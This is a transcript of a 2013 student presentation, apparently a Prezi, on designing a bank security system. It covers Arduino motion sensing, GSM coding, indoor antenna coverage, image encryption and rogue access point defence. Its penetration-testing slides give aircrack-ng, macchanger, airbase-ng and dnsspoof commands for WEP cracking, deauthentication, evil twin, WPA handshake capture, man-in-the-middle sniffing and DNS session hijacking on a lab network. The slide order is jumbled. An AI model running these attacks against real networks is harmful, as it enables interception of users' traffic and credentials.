Loading presentation...

Present Remotely

Send the link below via email or IM


Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.


Untitled Prezi

No description

Ola Ali

on 30 June 2013

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of Untitled Prezi

Bank Security system
Bank security
Idea of detect motion

the pc control our system to be day or night
we can control our system wirelessly using xbee

wireless connection
the used wireless system must be compatible with arduino & sensors

Arduino programme flow chart
Network Design

The Network Is Divided Into 3 Major Network ,
We Did Design The Network According To :

1-The Internal Network Of The Bank
2-The Service Provider Network
3-The Other Site OF The Network In Another City

What Network Did We Design ?

1-Multi-Site Network ( Wired Network )
2-Multi-Site Network (VOIP Network )
3-Single-Site Network (Wireless Network )

What About The wired Security It Self ?


Data transmission
GSM transmission chain
About The Designed Firewall
Flow chart

What About The Wired Network It Self

What Is Lockitron ?

It's A Mobil Application Allows You To Remotely Open And Close Doors …

What Is Has To Do With Our Project ?

We Did Replace The Card Reader Owned By Each Employee With That Mobile Application On Each Employee Mobil
Benefits :
2-Less Cost
3-Flexable ( Can Be Repaired And Tuned Easily )

Our Main Focus In The Project Is To Design A Security System for A Bank and we’re Considering Everything in That Secure System
Our Security system Involves In 5 Major Topics Which Are :
1-Control And Surveillance
2-Network Design
4-Indoor Coverage ( Gsm Coverage )
5-Penetration Testing

The addition of WLANs to the corporate environment class of threats for network security. introduces a new Rogue access points are the greatest threat
What is Rogue AP!!

What are some specific attacks which can be launched through Rogue AP?
1. MAC address spoofing

Evil twin with mac spoofing

2. Denial-of-Service

a.De-Authentication attack
b.Dis-Association attack
c.Signal interference

how can you protect enterprise network from Rogue APs?
* Can the firewall protect from Rogue AP


signal transmission problems
Penetration Testing

Securit camera
(motion detection )
CCTV system
Our model
Flow chart
Frame of camera
Wireless Lab Setup :
1- Hardware Requirements

1 – iwconfig

2- ifconfig wlan1 up
ifconfig wlan1

Testing connectivity between the tester laptop and the access point :
- Commands :
1- iwlist wlan1 scanning

2- iwconfig wlan1 essid "ESLAM TEST“
- iwconfig wlan1

- Wlan Frames Types : 1- Managements Frames
2- Control Frames
3- Data Frames
-Meaning of Sniffing Frames .
-Sniffing Management, Control, and Data Frames over any wireless network :
1- Monitor mode interface
2- Wireshark
----- 1- Monitor mode interface :
Commands :
a- airmon-ng

b- airmon-ng start wlan1

c- airmon-ng
----- 2- Wireshark :
Commands :
a- Wireshark& .  capture  interfaces  mon0  start

b- Filter: - Management Frames Only ‘s command  wlan.fc.type == 0
- Control Frames Only ‘s command  wlan.fc.type == 1
- Data Frames Only ‘s command  wlan.fc.type == 2

- Sniffing Management, Control, and Data Frames over a Given wireless network :
- Commands :
1- airodump-ng --bssid A0:F3:C1:78:32:4B mon0

2- iwconfig mon0 channel 6
- iwconfig mon0

3- Wireshark& .  capture  interfaces  mon0  start
4- Filter : wlan.bssid == A0:F3:C1:78:32:4B
5– Filter : Data Packets Only (wlan.bssid == 00:21:91:d2:8e:25) && (wlan.fc.type_subtype == 0x20)

Injecting packets into a given wireless network :
- Packets Injection Meaning .
-Commands :
1- aireplay-ng -9 -e ESLAM TEST -a A0:F3:C1:78:32:4B mon0

Uncovering hidden SSIDs :
1- legitimate client ( Probe Request, Probe Response )
2- sending Deauthentication packets.
 Command : aireplay-ng -0 5 -a A0:F3:C1:78:32:4B mon0
( Probe Request, Probe Response
MAC filters :
Setting up the Wireless Card ( Alfa ) and configuring it
Commands :

- Beating MAC Filters :
- Commands :1- airodump-ng –c 6 -a –bssid A0:F3:C1:78:32:4B mon0

Commands :2- macchanger –m B0:EC:71:B1:8A:17 wlan1

Authentication Types :
1 - Open
2- Shared Key
3- Wired Equivalent Privacy ( WEP )
4- Wi-Fi Protection Access ( WPA )
5- Wi-Fi Protection Access V2 (WPA2)

1- OPEN Authentication :

-Bypassing OPEN Authentication :
-Commands : a- iwconfig wlan1 essid "ESLAM TEST"
b- iwconfig wlan1

2 – Shared Key Authentication :

- Bypassing Shared Key Authentication :
Commands : a- Wireshark& capture  interfaces  mon0  start
b- airodump-ng mon0 –c 1 --bssid A0:F3:C1:78:32:4B -w keystream

C- ls
d- aireplay-ng -1 0 -e ESLAM TEST -y keystream-04-A0-F3-C1-78-32-4B.xor -a A0:F3:C1:78:32:4B -h aa:aa:aa:aa:aa:aa mon0

e- On wireshark  Filter : wlan.addr == aa:aa:aa:aa:aa:aa
---- First Packet :

---- Second Packet :

---- Third Packet :

---- Fourth Packet :

3- WEP Encryption :

- Bypassing WEP Encryption :
- Commands :
a- airodump-ng mon0

b- airodump-ng –bssid A0:F3:C1:78:32:4B --channel 1 --write WEPCrackingDemo mon0

C- aireplay-ng -3 –b A0:D3:C1:78:32:B4 –h B0:EC:71:B1:8A:17 mon0 - Capture ARP packets .

d- aircrack-ng WEPCRackingDemo-01.cap

Which type of detection can I use
Motion detection camera
2- Adjacent channel interference
3- Multipath fading

Rayleigh theorem

4- Shadow fading

5- Doppler shift

6- Delay Spread (Time Dispersion)
7- Distance Between MS and BTS
8- Path loss

Speech encoder

1. Analog to digital converting
(GSM use PCM ‘Pulse Code Modulation’ )
We reduce BW
 Sampling

 Bandlimiting + Sampling
 Quantizing

 Encoding
Number of level =2^13=8192 level
Encoder rate = 8000*13= 104Kb/sec
2. Segmentation

We divided the signal into gropes and each grope takes 20ms and has 2080 bits
20ms* 104kbps=2080bits

Channel coding
 Bloke coder
Add 3bits called ‘Parity Check Bits’
 Convolutional code
Doubling bits

 * Block interleaving

* Burst interleaving

Burst Assembly and Multiplexing
Here we adding Training Sequence, Flags, T.B and H.B
GMSK ‘Gaussian Minimum Shift Keying’ is the modulation scheme for GSM system

is the process of encoding messages (or information) in such a way that hackers cannot read it, the message or information (referred to as plaintext) is encrypted using an encryption algorithm, turning it into an unreadable Ciphertext .
This is usually done with the use of an Encryption key
Usage of Enfcryption start for the first time by simple way done by shift every letter 3 time

THE RC6 Algorithm

it's look like The Alogritm using for text but we deal with images so to encrypt image we will encrypt the image pixel to produce Scattered pixel hard to understand
By this we will have image unclear for other so we able to save the image security form hacker

i will translate some of the last steps and add new steps into matlab code
Some Additions to develope the code
1-Instead of using fixed key we can take a key from command window
in matlab with some conditions
2- We can use the shift oerations to make the decrypted image more
unclear to attacker
3- We can divide the image into more than 4 part and the divided can
done by equal length part or equal wide part or both them
4-When collect the parts for formation the image can follow many
arranging instead of the using in the code

indoor coverage
Distributed Antenna System or ‘DAS’
Donor (roof) antenna
* Directional antenna
The higher the gain of the antenna, the more the signal is focused along a specific plane.
BDA (Bi-Directional RF Amplifier)
BDA (Bi-Directional RF Amplifier)
Special device

1-isotropic antenna

2-dipole antenna

Indoor antennas
* Omni directional antenna
Basic Single Structure application
The range of the different types of antenna

1. Bi-directional Amplifier (BDA)
 * Poor out-of-band rejection
 * Fixed filtering

2. Analog RF booster
 * Better filtering
 * Tunable
 * Multiple bands

3. Digital RF booster


Time Delay

 * The delay through a filter is inversely proportional to its bandwidth and directly proportional to the filter ‘order’

 * Filter that is narrow band with a sharp roll off will have a higher time delay than will a wide band filter with a soft roll off.


 * Preventing Feedback Oscillations
 * Automatic Gain Control (AGC)
 * Microprocessor-Controlled AGC
 * Automatic Gain Optimization during set up
 * Oscillation Prevention
 * Long Term Maintenance

Uplink Noise

Base Station Disease

Other Services Disease

Single Structure Fiber Optic application
Multiple Structure 'Campus' application
Example of RF distribution on one floor
 represent unauthorized access points and can be internal or external
Why is Rogue AP such a bad thing?
Rogue AP on network =(logically) LAN jack of your network hanging out of the premises

We have two types for rouge access point

1.The internal rogue AP
2.The external rogue access point

3.Man-in-the-Middle Attack (mitm)

4.Monitoring WLAN traffic and breaking
the encryption keys

-Firewall works at traffic transfer point between LAN & Internet
-Firewall does not detect Rogue AP
-Firewall does not see traffic through Rogue AP

* Can the wpa2 protect from Rogue AP?

You can enforce security controls such as WPA2 only on APs which you manage,
i.e., your Authorized APs

But, Rogue AP is not your managed AP

* So what protects network from Rogue APs!!!
Sensor based wireless intrusion
prevention system (WIPS)

Watches for Rogue APs 24x7 Performs wired/wireless correlation for AP network connectivity testing

to detect Rogue AP

Provides for automatic blocking of Rogue AP
Locates Rogue AP for easy searching and removal from the network

A typical wireless intrusion prevention system consist of:
 Wireless sensor

 management server

 database server

 console
What does AP auto-classification mean in the context
of Rogue AP ?


What is key technology enabler for accurate autoclassification testing of AP’s connectivity to monitored enterprise network is the key technology enabler

1.false negative
2.false positive

How can wips detect rouge access point?
1) MAC Correlation (mac table lookup)
Can be done using back track&alfa card
a. The administrator has provided us with the list of MAC addresses of authorized clients and access points
we create the monitor mode using our card as shown

We use this command to start scanning the air seen by the alfa card

We dump a list of all MAC addresses on the switch of the clients network.In the most common case, the wired and wireless interface MAC addresses differ by 1.

2)Signature Packet Injection
The main types of events which can be detected by wireless intrusion prevention systems
1 . unauthorized WLANs and WLAN devices
(rogue APs, unauthorized stations);
This can be done also using backtrack
look at the client part of the airodump-ng output:

2. misconfigured access point
3. the use of wireless network scanners
4. Denial of Service (DoS)
5. man-in-the-middle attacks.
6. unusual usage patterns

How does wips contain rouge access point
1.Wired containment
2.Wireless containment

1.Wired containment

2.Wireless containment

Convergence method1
2. Vector method:

Locating(physical place) rogue wireless access points without using wips :
2- Software Requirements
a. Two LapTop’s with internal Wi-Fi Cards.
b. One Access point.
c. One Alfa Wireless Card.
d. An internet connection.
a. BackTrack 5.

-Setting up an access point and configuring it :

We used arduino board based on avr micro controller chip .
صwe used avr micro controlller becouse of
1. inexpensive
2.simple to program
3.low powerconsumption
4. avaliable from 8-64 pins

Small micro controller bored based on atmega 32u4
Arduino specification:
How to create a rouge access point throught backtrack
1. Let us first bring up our Rogue access point using airbase-ng and give it the ESSID Rogue:
2. use this commands to create a bridge between R ap &Ethernet interface.

The attacks that can be launched through backtrack
Microcontroller: ATMEGA 32U4
Operating voltage: 5V
Input voltages(recomanded):7-12V
Input voltages (limits): 6-20V
Input/out put pins: 14 pins
PWM pins : 7 pins
Analoge inputs: 6 pins
Dc current for i/o pins : 40 mA
Flash memory : 32 KB
SRAM: 2.5 KB
Clock speed: 16 MHZ
why we used arduino ?

From sotware side

simple to progam

Has alot of examples

Has agerat varity libraries

Cross platform working on windows, MAC , lineux
From hardware side

Power soket&rest button

sockts for I/O pins

USB connection

programing circuit

can power up by USB
Genarally :

open source (hardware &software)
in expensive
what is arduino ?
AVR is just programmable integrated circuit
Arduino is mini system has ( AVR micro controller, power supply circuit ,reset circuit ,usb connection)

what types of arduino ?

How does it work ?

1.Write a code (sketch) on arduino IDE by arduino c language
2. then select board, serial com
3.Upload it at arduino board

In arduino programming there are two main function:
Void setup ()
To define inputs and out put
Void loop()
To write a code here and repeated for ever

How does arduino communicate ?

Arduino uses UART for serial communications over a computer.

What the meant by serial communication?

Single data line transmitting data
Low Power
Low speed
It has two types (synchronous &Asynchronous)

What the meant by UART?

1.It is Arduino hardware has built-in support for serial communication on pins 0 and 1
which also goes to the computer via the USB connection.

2.This hardware allows the Atmega chip to receive serial communication even while working on other tasks, as long as there room in the 64 byte serial buffer.

General information about UART?
1.Universal Asynchronous Receiver/Transmitter (UART)
takes bytes of data and transmits the individual bits in a sequenance.
2. UART frame format(8-N-1)ز

What About The Wireless Network It Self
What the different between arduino and normal microcontroller (AVR)?
What About The VOIP Network

There are three types of sensor which depend
on infrared radiation:

1.Passive infrared sensor
2.Infrared sensor
3.Pressure switch

1. Passive infra red sensor

Idea of pir in detecting motion
Pir consist of:

Pyroelectric sensor
First we must know why we need to know about attacks ?
By study the types of attacks we will have the ability to know if we are exposed to Attack or not
Imagine that u have no idea about the attacks you sure will be hackerd to easy

Processing circuit
1-Evil twin
First we make access point with the same SSID of the vicinity access point Many wireless users may accidently connect to this malicious access point thinking it is part of the authorized network. Once a connection is established, the attacker can orchestrate a man-in-the-middle attack and transparently relay traffic while eavesdropping on the entire communication

Problems of pir &how to avoid it ?

1.No response for human motion
Solution :
Fresnel lens

2.False alarm
Solution :
IR window filter

- Now we send a De-Authentication frame to the client,
so it disconnects and immediately tries to re-connect

-As we are closer to this client, our signal strength is higher and it connects to our Evil Twin access point as shown in the following screens

Note :
An evil twin having the same MAC address as an authorized access point is even more difficult to detect and deter
Sensor pins
Calibration for sensor
Angle : 120
Distance : 7m max
Advantage of sensor
Low power consumption
Low cost
Wide range lens
Easy to interface with it

2-Honeypot :
Normally, when a wireless client such as a laptop is turned on, it will probe for the networks it has previously connected to. These networks are stored in a list called the Preferred Network List (PNL) on Windows-based systems. Also, along with this list, it will display any networks available in its range

If we creating a fake access point Wireless Lab in the presence of the legitimate one And the client is still connected to the legitimate access point Wireless Lab

So we need to send broadcast De-Authentication messages to the client on behalf of the legitimate access point to break their connection

2.Infrared sensor :

Idea of ir sensor
Ir transmitter
ir receiver
3-Hirte attack
3.pressure switch:
The Hirte attack extends the Caffe Latte attack using fragmentation techniques and allows for almost any packet to be used By creating WEP access point and once any client connects to out Honeypot AP, the Hirte attack is automatically launched
NOW would it be possible to crack WPA-Personal with just the client? No access point!
To crack WPA, we need the following four parameters from the Four-Way Handshake— Authenticator Nounce, Supplicant Nounce, Authenticator MAC, Supplicant MAC. Now the interesting thing is that we do not need all of the four packets in the handshake to extract this information. We can get this information with either all four packets, or packet 1 and 2, or just packet 2 and 3.

switch change between open &close by:
temperature like thermostat
current &voltage like relay
pressure as our state

In order to crack WPA-PSK, we will bring up a WPA-PSK Honeypot and when the client connects to us, only Message 1 and Message 2 will come through. As we do not know the passphrase, we cannot send Message 3. However, Message 1 and Message 2 contain all the information required to begin the key cracking process
The Steps
-We will setup a WPA-PSK Honeypot with the ESSID Wireless Lab
-Let's also start airodump-ng to capture packets from this network:
-Now when our roaming client connects to this access point, it starts the handshake but fails to complete it after Message 2 as discussed previously

Man-in-the-Middle attack
the attacker is connected to the Internet using a wired LAN and is creating a fake access point on his client card. This access point broadcasts an SSID similar to a local hotspot in the vicinity. A user may accidently get connected to this fake access point (or can be forced to using the higher signal strength theory) and may continue to believe that he is connected to the legitimate access point.

The attacker can now transparently forward all the user's traffic over the Internet using the bridge he has created between the wired and wireless interfaces

The Steps :
1-we will first c create a soft access point called mitm on the hacker laptop using airbase-ng. We run the command airbase-ng --essid mitm –c 11 mon0:
2-now create a bridge on the hacker laptop, consisting of the wired (eth0) and wireless interface (at0)
3-Let us now turn on IP Forwarding in the kernel so that routing and packet forwarding can happen correctly using echo > 1 /proc/sys/net/ipv4/ip_forward:
4-Now let us connect a wireless client to our access point mitm. It would automatically get an
IP address over DHCP (server running on the wired-side gateway).
5-We see that the host responds to the ping requests as seen

6-We can also verify that the client is connected by looking at the airbase-ng terminal on the hacker machine:
It is interesting to note here that because all the traffic is being relayed from the wireless interface to the wired-side, we have full control over the traffic
Wireless Eavesdropping using MITM
The whole lab revolves around the principle that all the victim's traffic is now routed through the attacker's computer. Thus the attacker can eavesdrop on all the traffic sent to and from the victim's machine over wireless
Start sniffing on the at0 interface, so that we can monitor all traffic sent and received by the wireless client
When the wireless client open up any web page that need password to enter and by sniffing the packet and set a filter for HTTP to see only the web traffic
we can easily locate the HTTP post request, which was used to send the password to the wireless access point

Expanding on the HTTP header, allows us to see that actually the password we entered in plaintext was not sent as is, but instead, a hash has been sent
Session Hijacking over wireless
One of the other interesting attacks we can build on top of
MITM is application session hijacking. During an MITM attack, the victim's packets are sent to the attacker. It is now the attacker's responsibility to relay this to the legitimate destination and relay the responses from the destination to the victim. An interesting thing to note is that, during this process the attacker can modify the data in the packets (if unencrypted and sunprotected from tampering). This means he could modify, mangle, and even silently drop packets.

The Steps :
1-Set up the test exactly as in the Man-in-the-Middle attack lab.
On the victim let's fire up the browser and type in "google.com". Let us use Wireshark to monitor this traffic. Your screen should resemble the following

2-In order to hijack the browser session we will need to send fake DNS responses which will resolve the IP address of "google.com" to the hacker machine's IP address The tool we will use for this is called Dnsspoof and the syntax is dnspoof –i mitm-bridge:
3-Refresh the browser windows and now as we can see through Wireshark, as soon as the victim makes a DNS request for any host (including google.com), Dnsspoof replies back:
On the victim machine, we see an error which says "Connection Refused". This is because we have made the IP address for google.com as which is the hacker machine's IP, but there is no service listening on port 80:
4-Let us run Apache on Back Track using the following command apachet2ctl start:
5-Now once we refresh the browser on the victim, we are greeted with It Works default page of Apache:
This demonstration shows how it is possible to intercept data and send spoofed responses to hijack sessions on the victim.
Thank you
we faced more than oe option comptiable with the arduino the most used
wifi shield
bluetooth shield
ethernet shield
we used xbee
what is xbee?
just blue chip have 20 pins
RF module can send data wireless
Current manufacturers for XBEE's are DIGI

why xbee ?
uses standard IEEE 802.15.4 (LR-WAPN)
low power consumption
low data rate
types of xbee
series 1

series 2

> 30 m range indoor
> digi mesh network
> 40 m range indoor
> zigbee network
xbee series 1
pro & regular
Full transcript